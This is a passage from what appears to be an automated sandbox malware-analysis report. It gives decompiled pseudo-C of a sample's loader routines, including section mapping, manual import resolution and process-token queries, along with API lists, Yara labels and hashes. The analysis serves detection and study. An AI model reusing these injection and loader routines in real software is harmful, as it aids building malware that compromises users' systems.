                                                                                                                                                                                                                                							_v16 = 0;
                                                                                                                                                                                                                                							_t64 = E736D9191(E736D9018( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
                                                                                                                                                                                                                                							__eflags = _t64;
                                                                                                                                                                                                                                							if(__eflags != 0) {
                                                                                                                                                                                                                                								E736D9018( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
                                                                                                                                                                                                                                								__eflags = _t48 - 1;
                                                                                                                                                                                                                                								if(_t48 != 1) {
                                                                                                                                                                                                                                									_v12 = 0;
                                                                                                                                                                                                                                									_push( &_v12);
                                                                                                                                                                                                                                									_t49 = E736DAAFE(_t64, _t64);
                                                                                                                                                                                                                                									__eflags = _t49;
                                                                                                                                                                                                                                									if(_t49 == 0) {
                                                                                                                                                                                                                                										_t58 = _v12;
                                                                                                                                                                                                                                										_t54 = 0;
                                                                                                                                                                                                                                										_t36 = _t58;
                                                                                                                                                                                                                                										__eflags =  *_t58;
                                                                                                                                                                                                                                										if( *_t58 == 0) {
                                                                                                                                                                                                                                											L17:
                                                                                                                                                                                                                                											_t37 = 0;
                                                                                                                                                                                                                                											 *0x736ef7e8 = _t54;
                                                                                                                                                                                                                                											_v12 = 0;
                                                                                                                                                                                                                                											_t49 = 0;
                                                                                                                                                                                                                                											 *0x736ef7ec = _t58;
                                                                                                                                                                                                                                											L18:
                                                                                                                                                                                                                                											E736DA293(_t37);
                                                                                                                                                                                                                                											_v12 = 0;
                                                                                                                                                                                                                                											L19:
                                                                                                                                                                                                                                											E736DA293(_t64);
                                                                                                                                                                                                                                											_t40 = _t49;
                                                                                                                                                                                                                                											L20:
                                                                                                                                                                                                                                											return _t40;
                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                											goto L16;
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                										do {
                                                                                                                                                                                                                                											L16:
                                                                                                                                                                                                                                											_t36 = _t36 + 4;
                                                                                                                                                                                                                                											_t54 = _t54 + 1;
                                                                                                                                                                                                                                											__eflags =  *_t36;
                                                                                                                                                                                                                                										} while ( *_t36 != 0);
                                                                                                                                                                                                                                										goto L17;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									_t37 = _v12;
                                                                                                                                                                                                                                									goto L18;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								_t42 = _v8 - 1;
                                                                                                                                                                                                                                								__eflags = _t42;
                                                                                                                                                                                                                                								 *0x736ef7e8 = _t42;
                                                                                                                                                                                                                                								_t43 = _t64;
                                                                                                                                                                                                                                								_t64 = 0;
                                                                                                                                                                                                                                								 *0x736ef7ec = _t43;
                                                                                                                                                                                                                                								L12:
                                                                                                                                                                                                                                								_t49 = 0;
                                                                                                                                                                                                                                								goto L19;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							_t44 = E736DA223(__eflags);
                                                                                                                                                                                                                                							_push(0xc);
                                                                                                                                                                                                                                							_pop(0);
                                                                                                                                                                                                                                							 *_t44 = 0;
                                                                                                                                                                                                                                							goto L12;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						__eflags =  *_t26;
                                                                                                                                                                                                                                						if( *_t26 != 0) {
                                                                                                                                                                                                                                							goto L8;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						goto L7;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					__eflags = _t48 - 1;
                                                                                                                                                                                                                                					if(__eflags == 0) {
                                                                                                                                                                                                                                						goto L5;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t45 = E736DA223(__eflags);
                                                                                                                                                                                                                                					_t66 = 0x16;
                                                                                                                                                                                                                                					 *_t45 = _t66;
                                                                                                                                                                                                                                					E736DA166();
                                                                                                                                                                                                                                					_t40 = _t66;
                                                                                                                                                                                                                                					goto L20;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                                                			}


























                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                • API String ID: 0-3922119987
                                                                                                                                                                                                                                • Opcode ID: 3a115ccec3ba2cf19ce416712f01ccb0bfa3a07234034750b60847cb87de8cf8
                                                                                                                                                                                                                                • Instruction ID: e10f520f5ffcbd174ee4da33ff10d0a702636923c7cd1ec01184036597b65734
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a115ccec3ba2cf19ce416712f01ccb0bfa3a07234034750b60847cb87de8cf8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1041A471A20314ABDF12DF9AD988B9EBBFDEB89710B14006AE405DB2C4D6718B44DB94
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                C-Code - Quality: 83%
                                                                                                                                                                                                                                			E00A6156C(char _a4) {
                                                                                                                                                                                                                                				long _v8;
                                                                                                                                                                                                                                				long _v12;
                                                                                                                                                                                                                                				char _v36;
                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                				long _t25;
                                                                                                                                                                                                                                				long _t27;
                                                                                                                                                                                                                                				long _t28;
                                                                                                                                                                                                                                				long _t32;
                                                                                                                                                                                                                                				intOrPtr _t40;
                                                                                                                                                                                                                                				signed int _t44;
                                                                                                                                                                                                                                				signed int _t45;
                                                                                                                                                                                                                                				long _t50;
                                                                                                                                                                                                                                				intOrPtr _t52;
                                                                                                                                                                                                                                				signed int _t53;
                                                                                                                                                                                                                                				void* _t57;
                                                                                                                                                                                                                                				void* _t60;
                                                                                                                                                                                                                                				signed int _t62;
                                                                                                                                                                                                                                				signed int _t63;
                                                                                                                                                                                                                                				void* _t67;
                                                                                                                                                                                                                                				intOrPtr* _t68;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t25 = E00A61D65();
                                                                                                                                                                                                                                				_v8 = _t25;
                                                                                                                                                                                                                                				if(_t25 != 0) {
                                                                                                                                                                                                                                					return _t25;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				do {
                                                                                                                                                                                                                                					_t62 = 0;
                                                                                                                                                                                                                                					_v12 = 0;
                                                                                                                                                                                                                                					_t50 = 0x30;
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t57 = E00A62020(_t50);
                                                                                                                                                                                                                                						if(_t57 == 0) {
                                                                                                                                                                                                                                							_v8 = 8;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t44 = NtQuerySystemInformation(8, _t57, _t50,  &_v12); // executed
                                                                                                                                                                                                                                							_t53 = _t44;
                                                                                                                                                                                                                                							_t45 = _t44 & 0x0000ffff;
                                                                                                                                                                                                                                							_v8 = _t45;
                                                                                                                                                                                                                                							if(_t45 == 4) {
                                                                                                                                                                                                                                								_t50 = _t50 + 0x30;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							_t63 = 0x13;
                                                                                                                                                                                                                                							_t10 = _t53 + 1; // 0x1
                                                                                                                                                                                                                                							_t62 =  *_t57 % _t63 + _t10;
                                                                                                                                                                                                                                							E00A61F0A(_t57);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					} while (_v8 != 0);
                                                                                                                                                                                                                                					_t27 = E00A617CE(_t57, _t62); // executed
                                                                                                                                                                                                                                					_v8 = _t27;
                                                                                                                                                                                                                                					Sleep(_t62 << 4); // executed
                                                                                                                                                                                                                                					_t28 = _v8;
                                                                                                                                                                                                                                				} while (_t28 == 9);
                                                                                                                                                                                                                                				if(_t28 != 0) {
                                                                                                                                                                                                                                					L25:
                                                                                                                                                                                                                                					return _t28;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				if(_a4 != 0) {
                                                                                                                                                                                                                                					L18:
                                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                                					_t67 = E00A61000(E00A61064,  &_v36);
                                                                                                                                                                                                                                					if(_t67 == 0) {
                                                                                                                                                                                                                                						_v8 = GetLastError();
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t32 = WaitForSingleObject(_t67, 0xffffffff);
                                                                                                                                                                                                                                						_v8 = _t32;
                                                                                                                                                                                                                                						if(_t32 == 0) {
                                                                                                                                                                                                                                							GetExitCodeThread(_t67,  &_v8);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						CloseHandle(_t67);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t28 = _v8;
                                                                                                                                                                                                                                					if(_t28 == 0xffffffff) {
                                                                                                                                                                                                                                						_t28 = GetLastError();
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					goto L25;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				if(E00A614E3(_t53,  &_a4) != 0) {
                                                                                                                                                                                                                                					 *0xa641b8 = 0;
                                                                                                                                                                                                                                					goto L18;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t52 = _a4;
                                                                                                                                                                                                                                				_t68 = __imp__GetLongPathNameW;
                                                                                                                                                                                                                                				_t60 =  *_t68(_t52, 0, 0);
                                                                                                                                                                                                                                				if(_t60 == 0) {
                                                                                                                                                                                                                                					L16:
                                                                                                                                                                                                                                					 *0xa641b8 = _t52;
                                                                                                                                                                                                                                					goto L18;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t19 = _t60 + 2; // 0x2
                                                                                                                                                                                                                                				_t40 = E00A62020(_t60 + _t19);
                                                                                                                                                                                                                                				 *0xa641b8 = _t40;
                                                                                                                                                                                                                                				if(_t40 == 0) {
                                                                                                                                                                                                                                					goto L16;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				 *_t68(_t52, _t40, _t60);
                                                                                                                                                                                                                                				E00A61F0A(_t52);
                                                                                                                                                                                                                                				goto L18;
                                                                                                                                                                                                                                			}
























                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A61D65: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00A61577), ref: 00A61D74
                                                                                                                                                                                                                                  • Part of subcall function 00A61D65: GetVersion.KERNEL32 ref: 00A61D83
                                                                                                                                                                                                                                  • Part of subcall function 00A61D65: GetCurrentProcessId.KERNEL32 ref: 00A61D9F
                                                                                                                                                                                                                                  • Part of subcall function 00A61D65: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00A61DB8
                                                                                                                                                                                                                                  • Part of subcall function 00A62020: HeapAlloc.KERNEL32(00000000,?,00A61593,00000030,747863F0,00000000), ref: 00A6202C
                                                                                                                                                                                                                                • NtQuerySystemInformation.NTDLL ref: 00A615A1
                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000,00000000,00000030,747863F0,00000000), ref: 00A615E8
                                                                                                                                                                                                                                • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00A6161E
                                                                                                                                                                                                                                • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00A6163C
                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00A61064,?,00000000), ref: 00A61673
                                                                                                                                                                                                                                • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 00A61685
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00A6168C
                                                                                                                                                                                                                                • GetLastError.KERNEL32(00A61064,?,00000000), ref: 00A61694
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A616A1
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.879916049.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.879953190.0000000000A65000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLastLongNamePathProcess$AllocCloseCodeCreateCurrentEventExitHandleHeapInformationObjectOpenQuerySingleSleepSystemThreadVersionWait
                                                                                                                                                                                                                                • String ID: @Mxt MxtTxt
                                                                                                                                                                                                                                • API String ID: 3479304935-1084903527
                                                                                                                                                                                                                                • Opcode ID: a44786c88d2219932279ceb5b3464446031c3f644e93e0c4a2a7ae3426093c79
                                                                                                                                                                                                                                • Instruction ID: a4f6db7c31b2a1d6b78e5c3cec612ecd9b32bd52ecbd99d142dcc2c403867519
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a44786c88d2219932279ceb5b3464446031c3f644e93e0c4a2a7ae3426093c79
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F831C47AD00216BBDB21DFA4CC44A9EBEBCEF54750F194122F505D3140EB70CE458BA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 38%
                                                                                                                                                                                                                                			E00A96307(char _a4, void* _a8) {
                                                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                                                				void* _v12;
                                                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                                                				void* _v20;
                                                                                                                                                                                                                                				char _v24;
                                                                                                                                                                                                                                				char _v28;
                                                                                                                                                                                                                                				char _v32;
                                                                                                                                                                                                                                				char _v36;
                                                                                                                                                                                                                                				char _v40;
                                                                                                                                                                                                                                				void* _v44;
                                                                                                                                                                                                                                				void** _t33;
                                                                                                                                                                                                                                				void* _t40;
                                                                                                                                                                                                                                				void* _t43;
                                                                                                                                                                                                                                				void** _t44;
                                                                                                                                                                                                                                				intOrPtr* _t47;
                                                                                                                                                                                                                                				char _t48;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				_v20 = _a4;
                                                                                                                                                                                                                                				_t48 = 0;
                                                                                                                                                                                                                                				_v16 = 0;
                                                                                                                                                                                                                                				_a4 = 0;
                                                                                                                                                                                                                                				_v44 = 0x18;
                                                                                                                                                                                                                                				_v40 = 0;
                                                                                                                                                                                                                                				_v32 = 0;
                                                                                                                                                                                                                                				_v36 = 0;
                                                                                                                                                                                                                                				_v28 = 0;
                                                                                                                                                                                                                                				_v24 = 0;
                                                                                                                                                                                                                                				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                                                                                                                                                                                                                					_t33 =  &_v8;
                                                                                                                                                                                                                                					__imp__(_v12, 8, _t33);
                                                                                                                                                                                                                                					if(_t33 >= 0) {
                                                                                                                                                                                                                                						_t47 = __imp__;
                                                                                                                                                                                                                                						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                                                                                                                                                                                                                						_t44 = E00A95157(_a4);
                                                                                                                                                                                                                                						if(_t44 != 0) {
                                                                                                                                                                                                                                							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                                                                                                                                                                                                                							if(_t40 >= 0) {
                                                                                                                                                                                                                                								memcpy(_a8,  *_t44, 0x1c);
                                                                                                                                                                                                                                								_t48 = 1;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							E00A953BB(_t44);
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						NtClose(_v8); // executed
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					NtClose(_v12);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t48;
                                                                                                                                                                                                                                			}



















                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00A9634E
                                                                                                                                                                                                                                • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 00A96361
                                                                                                                                                                                                                                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00A9637D
                                                                                                                                                                                                                                  • Part of subcall function 00A95157: RtlAllocateHeap.NTDLL(00000000,00000000,00A91259), ref: 00A95163
                                                                                                                                                                                                                                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00A9639A
                                                                                                                                                                                                                                • memcpy.NTDLL(00000000,00000000,0000001C), ref: 00A963A7
                                                                                                                                                                                                                                • NtClose.NTDLL(?), ref: 00A963B9
                                                                                                                                                                                                                                • NtClose.NTDLL(00000000), ref: 00A963C3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2575439697-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 72%
                                                                                                                                                                                                                                			E00A612E2(intOrPtr* __eax, void** _a4) {
                                                                                                                                                                                                                                				int _v12;
                                                                                                                                                                                                                                				void* _v16;
                                                                                                                                                                                                                                				void* _v20;
                                                                                                                                                                                                                                				void* _v24;
                                                                                                                                                                                                                                				int _v28;
                                                                                                                                                                                                                                				int _v32;
                                                                                                                                                                                                                                				intOrPtr _v36;
                                                                                                                                                                                                                                				int _v40;
                                                                                                                                                                                                                                				int _v44;
                                                                                                                                                                                                                                				void* _v48;
                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                				long _t34;
                                                                                                                                                                                                                                				void* _t39;
                                                                                                                                                                                                                                				void* _t47;
                                                                                                                                                                                                                                				intOrPtr* _t48;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t48 = __eax;
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                				_v24 =  *((intOrPtr*)(__eax + 4));
                                                                                                                                                                                                                                				_v16 = 0;
                                                                                                                                                                                                                                				_v12 = 0;
                                                                                                                                                                                                                                				_v48 = 0x18;
                                                                                                                                                                                                                                				_v44 = 0;
                                                                                                                                                                                                                                				_v36 = 0x40;
                                                                                                                                                                                                                                				_v40 = 0;
                                                                                                                                                                                                                                				_v32 = 0;
                                                                                                                                                                                                                                				_v28 = 0;
                                                                                                                                                                                                                                				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                                                                                                                                                                                                                                				if(_t34 < 0) {
                                                                                                                                                                                                                                					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					 *_t48 = _v16;
                                                                                                                                                                                                                                					_t39 = E00A6138A(_t48,  &_v12); // executed
                                                                                                                                                                                                                                					_t47 = _t39;
                                                                                                                                                                                                                                					if(_t47 != 0) {
                                                                                                                                                                                                                                						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						memset(_v12, 0, _v24);
                                                                                                                                                                                                                                						 *_a4 = _v12;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t47;
                                                                                                                                                                                                                                			}

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000,?), ref: 00A6133F
                                                                                                                                                                                                                                  • Part of subcall function 00A6138A: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00A61354,00000002,00000000,?,?,00000000,?,?,00A61354,00000002), ref: 00A613B7
                                                                                                                                                                                                                                • memset.NTDLL ref: 00A61361
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.879916049.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.879953190.0000000000A65000.00000040.00000010.sdmp Download File
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Section$CreateViewmemset
                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                • API String ID: 2533685722-2766056989
                                                                                                                                                                                                                                • Opcode ID: 14dd23b65c741bf67f1e39e3ddc61994533c0620d39a5c637d69a7a96097d9f8
                                                                                                                                                                                                                                • Instruction ID: ac8505bef3e4e1bb551c916203a27309d989e8a78e603871d28f8c97b5b6867a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 14dd23b65c741bf67f1e39e3ddc61994533c0620d39a5c637d69a7a96097d9f8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E7214DB5D00209AFCB11DFA9C8809EEFBF9EF08340F148429E516F7610D730AA058BA4
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A616C3(void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                				intOrPtr* _v12;
                                                                                                                                                                                                                                				_Unknown_base(*)()** _v16;
                                                                                                                                                                                                                                				signed int _v20;
                                                                                                                                                                                                                                				signed short _v24;
                                                                                                                                                                                                                                				struct HINSTANCE__* _v28;
                                                                                                                                                                                                                                				intOrPtr _t43;
                                                                                                                                                                                                                                				intOrPtr* _t45;
                                                                                                                                                                                                                                				intOrPtr _t46;
                                                                                                                                                                                                                                				struct HINSTANCE__* _t47;
                                                                                                                                                                                                                                				intOrPtr* _t49;
                                                                                                                                                                                                                                				intOrPtr _t50;
                                                                                                                                                                                                                                				signed short _t51;
                                                                                                                                                                                                                                				_Unknown_base(*)()* _t53;
                                                                                                                                                                                                                                				CHAR* _t54;
                                                                                                                                                                                                                                				_Unknown_base(*)()* _t55;
                                                                                                                                                                                                                                				void* _t58;
                                                                                                                                                                                                                                				signed int _t59;
                                                                                                                                                                                                                                				_Unknown_base(*)()* _t60;
                                                                                                                                                                                                                                				intOrPtr _t61;
                                                                                                                                                                                                                                				intOrPtr _t65;
                                                                                                                                                                                                                                				signed int _t68;
                                                                                                                                                                                                                                				void* _t69;
                                                                                                                                                                                                                                				CHAR* _t71;
                                                                                                                                                                                                                                				signed short* _t73;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t69 = __edi;
                                                                                                                                                                                                                                				_v20 = _v20 & 0x00000000;
                                                                                                                                                                                                                                				_t59 =  *0xa641c0;
                                                                                                                                                                                                                                				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
                                                                                                                                                                                                                                				if(_t43 != 0) {
                                                                                                                                                                                                                                					_t45 = _t43 + __edi;
                                                                                                                                                                                                                                					_v12 = _t45;
                                                                                                                                                                                                                                					_t46 =  *((intOrPtr*)(_t45 + 0xc));
                                                                                                                                                                                                                                					if(_t46 != 0) {
                                                                                                                                                                                                                                						while(1) {
                                                                                                                                                                                                                                							_t71 = _t46 + _t69;
                                                                                                                                                                                                                                							_t47 = LoadLibraryA(_t71); // executed
                                                                                                                                                                                                                                							_v28 = _t47;
                                                                                                                                                                                                                                							if(_t47 == 0) {
                                                                                                                                                                                                                                								break;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							_v24 = _v24 & 0x00000000;
                                                                                                                                                                                                                                							 *_t71 = _t59 - 0x69b25f44;
                                                                                                                                                                                                                                							_t49 = _v12;
                                                                                                                                                                                                                                							_t61 =  *((intOrPtr*)(_t49 + 0x10));
                                                                                                                                                                                                                                							_t50 =  *_t49;
                                                                                                                                                                                                                                							if(_t50 != 0) {
                                                                                                                                                                                                                                								L6:
                                                                                                                                                                                                                                								_t73 = _t50 + _t69;
                                                                                                                                                                                                                                								_v16 = _t61 + _t69;
                                                                                                                                                                                                                                								while(1) {
                                                                                                                                                                                                                                									_t51 =  *_t73;
                                                                                                                                                                                                                                									if(_t51 == 0) {
                                                                                                                                                                                                                                										break;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									if(__eflags < 0) {
                                                                                                                                                                                                                                										__eflags = _t51 - _t69;
                                                                                                                                                                                                                                										if(_t51 < _t69) {
                                                                                                                                                                                                                                											L12:
                                                                                                                                                                                                                                											_t21 =  &_v8;
                                                                                                                                                                                                                                											 *_t21 = _v8 & 0x00000000;
                                                                                                                                                                                                                                											__eflags =  *_t21;
                                                                                                                                                                                                                                											_v24 =  *_t73 & 0x0000ffff;
                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                											_t65 = _a4;
                                                                                                                                                                                                                                											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
                                                                                                                                                                                                                                											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
                                                                                                                                                                                                                                												goto L12;
                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                												goto L11;
                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                										_t51 = _t51 + _t69;
                                                                                                                                                                                                                                										L11:
                                                                                                                                                                                                                                										_v8 = _t51;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									_t53 = _v8;
                                                                                                                                                                                                                                									__eflags = _t53;
                                                                                                                                                                                                                                									if(_t53 == 0) {
                                                                                                                                                                                                                                										_t54 = _v24 & 0x0000ffff;
                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                										_t54 = _t53 + 2;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									_t55 = GetProcAddress(_v28, _t54);
                                                                                                                                                                                                                                									__eflags = _t55;
                                                                                                                                                                                                                                									if(__eflags == 0) {
                                                                                                                                                                                                                                										_v20 = _t59 - 0x69b25ec5;
                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                										_t68 = _v8;
                                                                                                                                                                                                                                										__eflags = _t68;
                                                                                                                                                                                                                                										if(_t68 != 0) {
                                                                                                                                                                                                                                											 *_t68 = _t59 - 0x69b25f44;
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                										 *_v16 = _t55;
                                                                                                                                                                                                                                										_t58 = 0x593682f4 + _t59 * 4;
                                                                                                                                                                                                                                										_t73 = _t73 + _t58;
                                                                                                                                                                                                                                										_t32 =  &_v16;
                                                                                                                                                                                                                                										 *_t32 = _v16 + _t58;
                                                                                                                                                                                                                                										__eflags =  *_t32;
                                                                                                                                                                                                                                										continue;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									goto L23;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								_t50 = _t61;
                                                                                                                                                                                                                                								if(_t61 != 0) {
                                                                                                                                                                                                                                									goto L6;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							L23:
                                                                                                                                                                                                                                							_v12 = _v12 + 0x14;
                                                                                                                                                                                                                                							_t46 =  *((intOrPtr*)(_v12 + 0xc));
                                                                                                                                                                                                                                							if(_t46 != 0) {
                                                                                                                                                                                                                                								continue;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							L26:
                                                                                                                                                                                                                                							goto L27;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t60 = _t59 + 0x964da13a;
                                                                                                                                                                                                                                						__eflags = _t60;
                                                                                                                                                                                                                                						_v20 = _t60;
                                                                                                                                                                                                                                						goto L26;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				L27:
                                                                                                                                                                                                                                				return _v20;
                                                                                                                                                                                                                                			}




























                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a61728
                                                                                                                                                                                                                                0x00a617a8
                                                                                                                                                                                                                                0x00a617a8
                                                                                                                                                                                                                                0x00a617af
                                                                                                                                                                                                                                0x00a617b4
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
